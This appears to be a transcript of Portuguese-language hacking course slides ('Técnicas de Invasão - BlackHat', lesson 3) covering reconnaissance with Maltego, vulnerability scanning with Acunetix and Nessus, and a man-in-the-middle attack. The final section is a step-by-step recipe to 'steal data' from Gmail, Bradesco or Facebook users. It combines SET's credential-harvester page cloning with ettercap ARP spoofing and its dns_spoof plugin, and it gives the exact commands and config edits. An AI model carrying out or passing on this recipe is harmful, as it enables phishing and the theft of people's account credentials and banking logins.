Top Banner
16

BlackHat Aula3

Jan 17, 2016

Download

Documents

Atila Sousa

BlackHat Aula3
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Coletando informaes - Maltego

    No Backtrack

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Coletando informaes - Maltego

    No Kali

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Coletando informaes - Maltego

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Coletando informaes

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Coletando informaes

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Scanner com Acunetix

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Scanner com Nessus

    Nessus um programa de verificao de falhas/vulnerabilidades de

    segurana. Ele composto por um cliente e servidor, sendo que o

    scan propriamente dito feito pelo servidor. O nessusd (servidor

    Nessus) faz um port scan ao computador alvo, depois disso vrios

    scripts (escritos em NASL, Nessus Attack Scripting Language)

    ligam-se a cada porta aberta para verificar problemas de segurana.

    At h pouco tempo o Nessus s funcionava no Linux, mas

    recentemente foi lanado o Nessus para Windows. uma excelente

    ferramenta designada para testar e descobrir falhas de segurana

    (portas, vulnerabilidades, exploits) de uma ou mais mquinas.

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Backtrack - Scanner com Nessus

    necessrio registar o Nessus antes do uso:

    Voc receber um e-mail com um cdigo de ativao parecido com

    esse:

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Backtrack - Scanner com Nessus

    Aps receber o e-mail, efetue o comando:

    /opt/nessus/bin/nessus-fetch register cdigo do email

    Em seguida, necessrio criar um usurio para o Nessus:

    Depois, inicie o servio:

    Agora voc poder acessa-lo atravs do endereo:

    https://ipdobacktrack:8834

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Kali - Scanner com Nessus

    Efetue o download na pgina abaixo e selecione seu sistema

    operacional

    http://www.tenable.com/products/nessus/select-your-operating-system

    Use o comando abaixa para intala-lo

    # dpkg i kali....deb

    Efetue o registro do seu Nessus no link abaixo

    http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-

    activation-code

    Acesse a pasta cd /opt/nessus/bin

    Entre com o comando abaixo para registrar seu Nessus

    # ./nessus-fetch --register "QREDDR-3$FDF-DFSE3-DFSD3

    Inicie o servio do Kali com o comando abaixo:

    # service nessusd start

    Agora voc poder acessa-lo atravs do endereo:

    https://ipdobacktrack:8834

    http://www.tenable.com/products/nessus/select-your-operating-systemhttp://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Kali - Scanner com Nessus

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Man in the Middle: DNS Poisoning

    Set (Social Engineer Toolkit)

    Ferramenta para Engenharia Social

    Com esta ferramenta capaz de criar pginas fakes para ataques de engenharia social,

    tais como: Gmail, facebook, etc.

    Voc tambm pode selecionar uma pgina para que ele Clone

    Local: /pentest/exploits/set

    Use: ./set

    No Kali, use o comando

    # set-toolkit

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Man in the Middle: DNS Poisoning

    Ettercap

    Ettercap um dos melhores Sniffers de rede para ataques Man in the Middle.

    Possui suporte com SSH1, SSL, Injeo de Caracteres, etc.

    Uso:

    ettercap Tqi eth0 M ARP // // -P dns_spoof

    -T = Apresenta em texto na tela o contedo sniffado

    -M = Man in the Middle Attack (arp, ICMP, DHCP, etc)

    -o = Only-mitm, desativa o Sniff e executa apenas o MITM

    -q = Quieto

    -i = iface, placa de rede ao qual quer capturar o contedo

    -P = Plugin, ativa o plugin necessrio para o ataque

    // // = Seleciona todas as redes e todos os gateways, trocando broadcast entre todos.

    Voc pode substituir o // por /192.168.1.1/ /192.168.1.2-10/

    O primeiro // seu gateway, o segundo sua rede e as maquinas a serem sniffadas

  • Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    Man in the Middle: DNS Poisoning

    Roubar dados do site do Gmail, Bradesco ou Facebook

    Verificar se o IP_Forward est ativo

    Editar o arquivo ettercap.conf

    #gedit /etc/ettercap.conf

    Zerar as linhas, ec_uid e ec_gid e descomentar as linhas do IPTABLES

    Corrigir o DNS do Ettercap

    #gedit /usr/local/share/ettercap/etter.dns

    Adicionar os dominios necessrios

    Executar o SET

    Selecionar o item 1 (Social Engineering Attack)

    Selecionar o item 2 (Website Attack Vectors)

    Selecionar o item 3 (Cred. Harvester Attack Method)

    Selecionar o item 1 (Websites templates)

    Selecionar o item 2 (Gmail)

    Executar o ettercap com captura de DNS Spoof

    # ettercap Tqi eth0 M ARP // // -P dns_spoof

    Ir at o alvo e executar o site do Gmail

  • E-mail: alan.sanches@esecurity.com.br

    Twitter: @esecuritybr e @desafiohacker

    Skype: desafiohacker

    Fanpage: www.facebook.com/academiahacker

    Aula 3 Treinamento: Tcnicas de Invaso - BlackHat

    printf ("\Chega por hoje\n");

    www.eSecurity.com.br

    mailto:alan.sanches@esecurity.com.br